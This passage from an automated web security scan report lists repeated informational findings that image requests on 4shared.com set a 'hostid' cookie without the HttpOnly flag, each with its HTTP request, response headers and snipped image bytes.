Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:06 GMT; Path=/
Set-Cookie: hostid=-902995665; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:06 GMT
ETag: W/"1358-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1358
Date: Fri, 29 Jul 2011 14:08:05 GMT

GIF89a+.-.............CQ....dj.QWX...RWv...]f.......eh{...*4k-9yaj.W]....?EF:I....7=_<Ds]`u...GKjjs....IQ.nr.377r}..........~.0@..../?.r{.bn.]b.y..{.............'..3B....5D.dn.EMw3>x..._k....2@.7F.f
...[SNIP]...

6.75. http://www.4shared.com/images/featimg1mus.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/featimg1mus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=2011318993; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg1mus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:56 GMT; Path=/
Set-Cookie: hostid=2011318993; Expires=Mon, 26-Jul-2021 14:07:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:56 GMT
ETag: W/"2345-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 2345
Date: Fri, 29 Jul 2011 14:07:56 GMT

GIF89a+.-.......VZw?M.^`r...LRw.........Vb.......x}.Wb....di.....:w......LT.......CKx9CxRTd...qw....U]....FI^...lq.3>ynz....4<i......17[...am................5D.........................bj..........[]nw
...[SNIP]...

6.76. http://www.4shared.com/images/featimg2doc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/featimg2doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=772522528; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg2doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:06 GMT; Path=/
Set-Cookie: hostid=772522528; Expires=Mon, 26-Jul-2021 14:08:06 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:06 GMT
ETag: W/"1276-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1276
Date: Fri, 29 Jul 2011 14:08:06 GMT

GIF89a&.-....rsu,.:...~.......iilJKR08H...nnq......vvzfgj.................TUYabe...XY\...OPT...VWZ...QRV...RSW...Z[^...\]`zz|...........^_c...HHNcdg......kko..................}}......TTZPRZ......}
...[SNIP]...

6.77. http://www.4shared.com/images/featimg3doc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/featimg3doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=274028166; Expires=Mon, 26-Jul-2021 14:08:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg3doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:07 GMT; Path=/
Set-Cookie: hostid=274028166; Expires=Mon, 26-Jul-2021 14:08:07 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:07 GMT
ETag: W/"1370-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1370
Date: Fri, 29 Jul 2011 14:08:07 GMT

GIF89a+.-.......~.eej...BCFmmqDEHabe......iilLMQ...IJMvvyRSW.........OPTQRV......TUY.........qrt......VWZ...XY\...............Z[^yz|^_c..................\]`............cdg............}}klottw.....V
...[SNIP]...

6.78. http://www.4shared.com/images/featimg4doc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/featimg4doc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1080640120; Expires=Mon, 26-Jul-2021 14:08:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg4doc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:08 GMT; Path=/
Set-Cookie: hostid=-1080640120; Expires=Mon, 26-Jul-2021 14:08:08 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:08 GMT
ETag: W/"1425-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1425
Date: Fri, 29 Jul 2011 14:08:07 GMT

GIF89a&.-....noq...qrtzz|......JKMPQU........................ttw||~....................................fgj...TUY\\`..wwziil......}}.........hhl...FGKMNQqrr......JJP...VWZXX]...Z[^...jkn``e\]`xx{...B
...[SNIP]...

6.79. http://www.4shared.com/images/featimg4mus.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/featimg4mus.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1811163653; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/featimg4mus.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:57 GMT; Path=/
Set-Cookie: hostid=-1811163653; Expires=Mon, 26-Jul-2021 14:07:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:57 GMT
ETag: W/"1381-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1381
Date: Fri, 29 Jul 2011 14:07:56 GMT

GIF89a$.-....~.LMQ...QRV\]aXY\DDI............IIMeei...ABF...iim...qrt.........noq............vwzzz|........................abe......OPTTTY......VWZ...............}}............ttw.........~~.klocdg
...[SNIP]...

6.80. http://www.4shared.com/images/fileSharing.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/fileSharing.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1650051724; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/fileSharing.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:52 GMT; Path=/
Set-Cookie: hostid=-1650051724; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:52 GMT
ETag: W/"13475-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/jpeg
Content-Length: 13475
Date: Fri, 29 Jul 2011 14:09:51 GMT

......JFIF.....d.d......Ducky.......7......Adobe.d....................
...
. .. ..................................##########...............#################################################...........
...[SNIP]...

6.81. http://www.4shared.com/images/fileSharingScheme.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/fileSharingScheme.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1095631374; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/fileSharingScheme.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:52 GMT; Path=/
Set-Cookie: hostid=1095631374; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:52 GMT
ETag: W/"19921-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 19921
Date: Fri, 29 Jul 2011 14:09:51 GMT

GIF89a............................xxy..iCn.Y.....qt.......RSV...........................&1F~.....LUl......9f.'*/...............Ox......K8D\............."9...............u.D.........]dv?^..............
...[SNIP]...

6.82. http://www.4shared.com/images/fileSharingView.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/fileSharingView.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1147627922; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/fileSharingView.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:52 GMT; Path=/
Set-Cookie: hostid=-1147627922; Expires=Mon, 26-Jul-2021 14:09:52 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:52 GMT
ETag: W/"7971-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 7971
Date: Fri, 29 Jul 2011 14:09:52 GMT

GIF89a.................w9..]..NOS......~...].X.................[...............`.^......Tj..Q..........-3`....I`..`...........s........... .........88;......,U;......C.X......~?"...]j.JQz.A........
...[SNIP]...

6.83. http://www.4shared.com/images/hborders.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/hborders.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1409556916; Expires=Mon, 26-Jul-2021 14:08:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/hborders.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:00 GMT; Path=/
Set-Cookie: hostid=-1409556916; Expires=Mon, 26-Jul-2021 14:08:00 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:00 GMT
ETag: W/"1246-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 1246
Date: Fri, 29 Jul 2011 14:08:00 GMT

GIF89a..&....~....qrt...NOS...z{}..z{~Z[]...|}............................stw......rsu...........................efi...fgi...UVXQRV...`adwx{~.deg{|pqsmnq..............~~....fgjUVZjjnklo...TUY[\^g
...[SNIP]...

6.84. http://www.4shared.com/images/icons/16x16/expand.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/16x16/expand.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1209208774; Expires=Mon, 26-Jul-2021 14:07:34 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/16x16/expand.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:34 GMT; Path=/
Set-Cookie: hostid=1209208774; Expires=Mon, 26-Jul-2021 14:07:34 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:34 GMT
ETag: W/"239-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: image/png
Content-Length: 239
Date: Fri, 29 Jul 2011 14:07:34 GMT

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.%.q..T...\..H....%>>...aA.. ....{..>8].....`......`....4......{7..vF......KKK.............gHHH..3....QQQ........
...[SNIP]...

6.85. http://www.4shared.com/images/icons/16x16/shrink.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/16x16/shrink.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1253799123; Expires=Mon, 26-Jul-2021 14:09:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/16x16/shrink.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:28 GMT; Path=/
Set-Cookie: hostid=-1253799123; Expires=Mon, 26-Jul-2021 14:09:28 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:28 GMT
ETag: W/"234-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: image/png
Content-Length: 234
Date: Fri, 29 Jul 2011 14:09:28 GMT

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.%.q....022......%........`...YEE...s...!..i...d...;X........pC...p......`....4......{7...= ...l....^.R....-..l..
...[SNIP]...

6.86. http://www.4shared.com/images/icons/64x64/dollars.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/64x64/dollars.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-964388347; Expires=Mon, 26-Jul-2021 14:03:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/64x64/dollars.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:03:00 GMT; Path=/
Set-Cookie: hostid=-964388347; Expires=Mon, 26-Jul-2021 14:03:00 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:03:00 GMT
ETag: W/"5709-1296125992000"
Last-Modified: Thu, 27 Jan 2011 10:59:52 GMT
Content-Type: image/png
Content-Length: 5709
Date: Fri, 29 Jul 2011 14:03:00 GMT

.PNG
.
...IHDR...?...?.....W_......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[il\.u>o..3...I-....$[...i.@rl7.."...u....(...........E..IP.E..I.4m.G..x.-..eK.....}83..-.........%.#=..e..g..w.....?~
...[SNIP]...

6.87. http://www.4shared.com/images/icons/64x64/support.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/64x64/support.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1922893287; Expires=Mon, 26-Jul-2021 14:03:00 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/64x64/support.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:03:00 GMT; Path=/
Set-Cookie: hostid=1922893287; Expires=Mon, 26-Jul-2021 14:03:00 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:03:00 GMT
ETag: W/"7725-1296125992000"
Last-Modified: Thu, 27 Jan 2011 10:59:52 GMT
Content-Type: image/png
Content-Length: 7725
Date: Fri, 29 Jul 2011 14:03:00 GMT

.PNG
.
...IHDR...?...@......+......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..[i..gy~........-......,_...6.cs.........B.?.2?RE~...8@..* .9.26`..[..ek..,...j....{z...._w..k d...........y.o.=..C.z !.
...[SNIP]...

6.88. http://www.4shared.com/images/icons/all.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/all.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=801665821; Expires=Mon, 26-Jul-2021 14:02:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/all.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:02:45 GMT; Path=/
Set-Cookie: hostid=801665821; Expires=Mon, 26-Jul-2021 14:02:45 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:02:45 GMT
ETag: W/"43289-1311929454000"
Last-Modified: Fri, 29 Jul 2011 08:50:54 GMT
Content-Type: image/png
Content-Length: 43289
Date: Fri, 29 Jul 2011 14:02:45 GMT

.PNG
.
...IHDR.............K.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..}.`.E...{..K. !..B...@h. .4..
R.......A,.......H....HHH/...z....].!......?/..;;.dvv.}.wfv...x1.0.3...h\....T.........~x
...[SNIP]...

6.89. http://www.4shared.com/images/icons/flags/ae.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/ae.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1395312391; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/ae.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:46 GMT; Path=/
Set-Cookie: hostid=-1395312391; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:46 GMT
ETag: W/"361-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 361
Date: Fri, 29 Jul 2011 13:59:46 GMT

GIF89a........]].h.....X..G..........DDDM.M;;;...R.R444.EE.{..YY.{{.ww.......t..JI..........OO.==.TT.yy/./...o.o)))V.V.OP\.\7.7._`PPP@.@....XX.JKe.e.jj.SS!!!KKKa.`H.H.rs............................
...[SNIP]...

6.90. http://www.4shared.com/images/icons/flags/ar.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/ar.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=739588649; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/ar.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:46 GMT; Path=/
Set-Cookie: hostid=739588649; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:46 GMT
ETag: W/"366-1295256542000"
Last-Modified: Mon, 17 Jan 2011 09:29:02 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:46 GMT

GIF89a.......6.......i...i..|..L........u........*......................I.......................................C....................!....................Y..........^a..|...................u..........
...[SNIP]...

6.91. http://www.4shared.com/images/icons/flags/au.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/au.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=2072054508; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/au.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:46 GMT; Path=/
Set-Cookie: hostid=2072054508; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:46 GMT
ETag: W/"378-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 378
Date: Fri, 29 Jul 2011 13:59:46 GMT

GIF89a..........Sj.....-..w.Zr...........+HA\...2..R#A........ih...v..Jc......e...h}.5Q....Mk.:V..v.m........E_.q..0M.Ib.>Y..fj.qo......u=i..........................q....kEu....op.~......KM........
...[SNIP]...

6.92. http://www.4shared.com/images/icons/flags/bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/images/icons/flags/bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=-1980316378; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:46 GMT; Path=/
Set-Cookie: hostid=-1980316378; Expires=Mon, 26-Jul-2021 13:59:46 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:46 GMT
ETag: W/"360-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 360
Date: Fri, 29 Jul 2011 13:59:46 GMT

